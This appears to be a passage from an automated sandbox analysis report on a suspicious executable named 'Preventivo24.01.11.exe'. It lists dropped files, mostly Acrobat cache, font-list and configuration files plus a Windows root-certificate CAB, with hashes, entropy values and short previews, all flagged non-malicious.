                      Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):324
                      Entropy (8bit):5.109846479746542
                      Encrypted:false
                      SSDEEP:6:HMWpPUWjyq2Pwkn2nKuAl9OmbzNMxIFUt8+MWpPUF9/1Zmw++MWpPU1gpRkwOwkS:H5PLjyvYfHAa8jFUt8+5Pq99/++5PZpB
                      MD5:99BEB36717C7BB72FB92C972D6CAEDE4
                      SHA1:3D1C7AE05C174CB56E5CFB9777BC423B5F4B5624
                      SHA-256:A4C7C92192C2F79B3ADD9F5730CF910D3F4E8DE7E983420572A723042307B9C8
                      SHA-512:25EB2C695E9FB29BCAF56058EC3E21A04F6470D34193C84DAF0C1EA939A2B5FF361EBCFA39B7E75D12CB3414C33BC1F1F480245E0668D327916C614F79558F44
                      Malicious:false
                      Preview:2024/01/23-12:18:10.101 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/01/23-12:18:10.104 1be4 Recovering log #3.2024/01/23-12:18:10.105 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:ASCII text
                      Category:dropped
                      Size (bytes):324
                      Entropy (8bit):5.109846479746542
                      Encrypted:false
                      SSDEEP:6:HMWpPUWjyq2Pwkn2nKuAl9OmbzNMxIFUt8+MWpPUF9/1Zmw++MWpPU1gpRkwOwkS:H5PLjyvYfHAa8jFUt8+5Pq99/++5PZpB
                      MD5:99BEB36717C7BB72FB92C972D6CAEDE4
                      SHA1:3D1C7AE05C174CB56E5CFB9777BC423B5F4B5624
                      SHA-256:A4C7C92192C2F79B3ADD9F5730CF910D3F4E8DE7E983420572A723042307B9C8
                      SHA-512:25EB2C695E9FB29BCAF56058EC3E21A04F6470D34193C84DAF0C1EA939A2B5FF361EBCFA39B7E75D12CB3414C33BC1F1F480245E0668D327916C614F79558F44
                      Malicious:false
                      Preview:2024/01/23-12:18:10.101 1be4 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/01/23-12:18:10.104 1be4 Recovering log #3.2024/01/23-12:18:10.105 1be4 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                      Category:dropped
                      Size (bytes):86016
                      Entropy (8bit):4.444965548209977
                      Encrypted:false
                      SSDEEP:384:yezci5tciBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r7s3OazzU89UTTgUL
                      MD5:F3D03763B49598DBAD45643FF5B9548C
                      SHA1:8DB0B1C6C2AF2D7DAE7B96394E992152C9EB1ECC
                      SHA-256:E75B7D24B58CCF162BBD5E2353FB8538226A057239CA98F8BFE488FDAF0432BE
                      SHA-512:D0E870D59182C5A09313490AA9EA07E43416BAEE2F2BD9D39E4B244761B25FD8869E5560529E2432525F7FE0B113E4798B5A1B76B5F541F4876CFACA163BBEFB
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite Rollback Journal
                      Category:dropped
                      Size (bytes):8720
                      Entropy (8bit):3.775195806422905
                      Encrypted:false
                      SSDEEP:48:7M4Dp/E2ioyVmioy9oWoy1Cwoy1yKOioy1noy1AYoy1Wioy1hioybioyEoy1noy+:7DDpjumFJXKQpBWb9IVXEBodRBkZ
                      MD5:F4A34F8B68409CDAC14B3E7E86D35C74
                      SHA1:A88C78C32487317F1CABF717102232DF47A71320
                      SHA-256:6A44DA9F4C3E639DCC7656ECE568E8D3E371B6CD010F69D9D4B1F0F3A2F1B2F0
                      SHA-512:320A379E05DB9CE1634014891DEF5A39DBFD4D60194E0265BA2887562FA04BFAEF65BB48B0A86771F3EF9A33AB3CE9B0EB288FAEADA992EC851F9FA8DEB30BBA
                      Malicious:false
                      Preview:.... .c.......U................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 66791 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                      Category:dropped
                      Size (bytes):66791
                      Entropy (8bit):7.995531727155867
                      Encrypted:true
                      SSDEEP:1536:drFvD2YSE/sFDqV0FJJynkAhftCvMd3coa282frgW1qgNzU:drVDJSeaDqV0FJwLhVkr282fF5U
                      MD5:AC05D27423A85ADC1622C714F2CB6184
                      SHA1:B0FE2B1ABDDB97837EA0195BE70AB2FF14D43198
                      SHA-256:C6456E12E5E53287A547AF4103E0397CB9697E466CF75844312DC296D43D144D
                      SHA-512:6D0EF9050E41FBAE680E0E59DD0F90B6AC7FEA5579EF5708B69D5DA33A0ECE7E8B16574B58B17B64A34CC34A4FFC22B4A62C1ECE61F36C4A11A0665E0536B90D
                      Malicious:false
                      Preview:MSCF............,...................I.................gW.e .authroot.stl..u/1.5..CK..<Tk...p.k:..c.Y:.(Qc...%Y.f_...$..DHn..6i/.]....-!QQ*..}f..f...}..1....9.......pN..mI.a.....!...N.....xP.f6..C.'#.c.@GN(3.<3.......9...('3...l.l....B..x..e...UWFU.TT.l.L...._.l1......w.\..Xb.v..Q......pKP.....M`.Y......Op4=.(=P.e...p.(U.....z7MF..O......V2.....#...pj...z.!...wQ...V&.Gz..Nv.4..y(J...A..':.2Q.^u.y..<.1..2..o........H.D.S.....62.| w(...B.......h.QZ..'....l.<....6..Z...p?... .pT.......l..S..K....FT?.....p..`.&..y..."T=l.n..egf.w..X.Y...G.m....=.}cO.7.....9....o..:.Y=.-.5....ud.J&.]..*Q..._<.S....{a.=.n...PT.Um).| kpyA....h.PXY.>.......^2U...H.....V<\...k..~....H..p...8..'..?...r>.4..!u......1\.`.<.+..n..p..]...).....L.g....#.<..c]R.U."\i.Z.>...`Q..g6....0.......F.........N.s.Z..A........m.^....a_..>v.-.mk...wt.n.:...>S..;....1...j.+m.&S......$.T...i.B=h.n...c.!e.....Y.#..bw.}...d.. ..w... .&..w.9..}k...\...=....{q.Up..y;..7.-.K.'.....
                      Process:C:\Users\user\Desktop\Preventivo24.01.11.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):330
                      Entropy (8bit):3.1308583258674845
                      Encrypted:false
                      SSDEEP:6:kKtIHesurN+SkQlPlEGYRMY9z+4KlDA3RUeWc3l0:iHNPkPlE99SNxAhUeWcC
                      MD5:345D1F3907A46A8C8C8F1F625ACADB22
                      SHA1:9208172DBA451DC3B503E8DCB16E47A42D73F935
                      SHA-256:FECB11CC085BD55C400F7DEF826DA5443366D4F557F510C059AC1426BF4EE47C
                      SHA-512:A1641CC0EAC173419E1C773A6C7AAFADF4CFBC4B87870AD56F3EA08C4845708F07E13CED231619D69142F8197966F83D308BC15FBE136A3DCB698E40A1EF7DCC
                      Malicious:false
                      Preview:p...... .............M..(....................................................... ..........H"......(...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".3.f.e.4.e.6.1.a.4.8.2.2.d.a.1.:.0."...
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):1233
                      Entropy (8bit):5.233980037532449
                      Encrypted:false
                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):1233
                      Entropy (8bit):5.233980037532449
                      Encrypted:false
                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):1233
                      Entropy (8bit):5.233980037532449
                      Encrypted:false
                      SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                      MD5:8BA9D8BEBA42C23A5DB405994B54903F
                      SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                      SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                      SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):10880
                      Entropy (8bit):5.214360287289079
                      Encrypted:false
                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                      MD5:B60EE534029885BD6DECA42D1263BDC0
                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:PostScript document text
                      Category:dropped
                      Size (bytes):10880
                      Entropy (8bit):5.214360287289079
                      Encrypted:false
                      SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                      MD5:B60EE534029885BD6DECA42D1263BDC0
                      SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                      SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                      SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                      Malicious:false
                      Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):295
                      Entropy (8bit):5.3505025885059245
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJM3g98kUwPeUkwRe9:YvXKX9drEZc0v2GMbLUkee9
                      MD5:DE16E4AC9E1A90875D2A72FAC474BF90
                      SHA1:5AC48F30314B0B2A50D4502F3BFD2E164BE10C6E
                      SHA-256:04FABCE6CCDB7BECD98DA42B5055EFF28BF01F6B3629F7A41A1AFEA58007C0ED
                      SHA-512:47E873A350DE84A19CC43E4FE7AAD6486EE11778A752F7BFC3E3613A22D72B53697F6A6F96C8F5B6B544DBDA773DF514D09AE7C3CD2343FD7B6018E005AD3E7C
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.298335401437078
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfBoTfXpnrPeUkwRe9:YvXKX9drEZc0v2GWTfXcUkee9
                      MD5:51D958E01C2936D316E71B046D7B00D0
                      SHA1:515DD1513B3BAAD70990BEE5B6640D0A4EA8A676
                      SHA-256:21D98BEDB66D1FC9DDFB8CB0282180CA1EAE761D21C401FD56A4F04BD9A43BC3
                      SHA-512:BCCFDD66746E6A2D40192B26FED2BF127A9C9465D94311B91D5442A881558D73ED84D4A9D3972B4511FEC06D9E937EB0437DB3DE569511AB9F73348B862981BC
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):294
                      Entropy (8bit):5.277156476482677
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfBD2G6UpnrPeUkwRe9:YvXKX9drEZc0v2GR22cUkee9
                      MD5:84AEBFBA61A4F47397F3BAE1EB35EFEB
                      SHA1:8959CA817AF3BF10F10BAC617CEC7F904670D739
                      SHA-256:93BFA14FE9CF847B37F06D7870C16FB62B832200A6E7AA070A223D3D9C99E42D
                      SHA-512:CD8CE406E322D50A07C482C168C3C79E8279C64966BF09EEEA0D251813478E0A2B0E97F389BEF1C7674165461309218A0E0A6728D2375653B797E30063A4904D
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):285
                      Entropy (8bit):5.337061838637531
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfPmwrPeUkwRe9:YvXKX9drEZc0v2GH56Ukee9
                      MD5:F57B295E1879E47A87C7AAFB79C74F28
                      SHA1:52F0F9260C60E4A00FCD1FAA7FFA9F97BEBDB4DB
                      SHA-256:7C015830064ABCD644D2D19DB1A1DB5E4C23E8483B1CE54E6ABF00B1D1ACFAEE
                      SHA-512:897AD1B2E90E0A1DF2D91B513233A3D149C37CC368B704FB36AFD9C9B3FB4174ED558D84B2D00A10A788AC6A4CCB367EE8CB34CA9099CD43F78C8AF2F6B265BC
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1255
                      Entropy (8bit):5.697841344751659
                      Encrypted:false
                      SSDEEP:24:Yv6XjrEzvjpLgEsv4ce3KnctSrymTBcu14wChluBks8ctq3H6w:YvjbhgnvjRrNTB5OJhABks8c2H3
                      MD5:83B5A78640074BE50C0A976ADEA3188E
                      SHA1:CFDB548C7444E09D8FD369B95A8901848B9E6626
                      SHA-256:3B28454658CEB3A135FC34293AA490BC5948A17DC7793E5885A6B5264ADF9DC2
                      SHA-512:F1363A2091EE3AEF59B01BC2FC94924B0494412C3D9ABED7143C327E7AC98419565C67E44A5E5769C38FFAF735FA1FC3BF0C9810061E93C6F8D99EE725523644
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_0","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"f7fa0e9f-7d25-4321-b719-c501bbb8a162","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0IGZpbGVzIHRvIGFuZCBmcm9tIFBERiBcbndpdGhvdXQgbGltaXRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5k
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1250
                      Entropy (8bit):5.705924650104191
                      Encrypted:false
                      SSDEEP:24:Yv6XjrEzv/VLgEsy4c19ZrGmTBcu14wCh5rgos8ctq3H6w:YvjXFgnyl9ZrBTB5OJhFgos8c2H3
                      MD5:AE1F871F39266581C6EAAB0052C008FE
                      SHA1:6912F063B612B28221FB9FBDBE79218A8F29AAF4
                      SHA-256:51F479F1DFEEB00A09AC293149374033FAA816F2B04798FCF55AB1B4489BD3AF
                      SHA-512:3823C1FA97549E41C9575F1ADE7F191FC7C237B219AC41C8263B1E162BA68AB2556D74CE304A8C5CCB065D991138EA4A3914342E4D48E29F317E23113990418B
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"65179_200306ActionBlock_1","campaignId":65179,"containerId":"1","controlGroupId":"","treatmentId":"250f56c6-2d66-4fca-8033-eabbd2bc9951","variationId":"200306"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidHlwZSI6ImJ1dHRvbiIsInRleHQiOiJGcmVlIDctZGF5IHRyaWFsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTQiLCJmb250X3N0eWxlIjoiMyJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE0IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjoiIiwiZGVzY3JpcHRpb24iOiJDb252ZXJ0LCBlZGl0IGFuZCBlLXNpZ24gUERGXG4gZm9ybXMgJiBhZ3JlZW1lbnRzLiIsImJhY2tncm91bmRfc3R5bGluZyI6eyJiYWNrZ3JvdW5kX2Nvb
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):292
                      Entropy (8bit):5.2852649756232015
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9UE1F9VoZcg1vRcR0YuqGoAvJfQ1rPeUkwRe9:YvXKX9drEZc0v2GY16Ukee9
                      MD5:6733266AE2B020F034106EA395FDB3C4
                      SHA1:82048A05972CA8AE630931E29A0169EDD709D20B
                      SHA-256:D91121A0C51D8AA3444AFA7AB8BCAB9CC45EC217383AE71CC268063886C25993
                      SHA-512:7C8CBD17BA4BACDDC4621C64AF1A0436703B6A718EE86A91192F30D64D03EF8C820DC5C860D09C6BB94E52F37C2BE354C2F5FC5417AA02DD9ABF56CB4359CFC7
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"798431ce-89d6-4a48-ae39-c3edaa90682f","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1706182098562,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):1230
                      Entropy (8bit):5.687883485146177
                      Encrypted:false
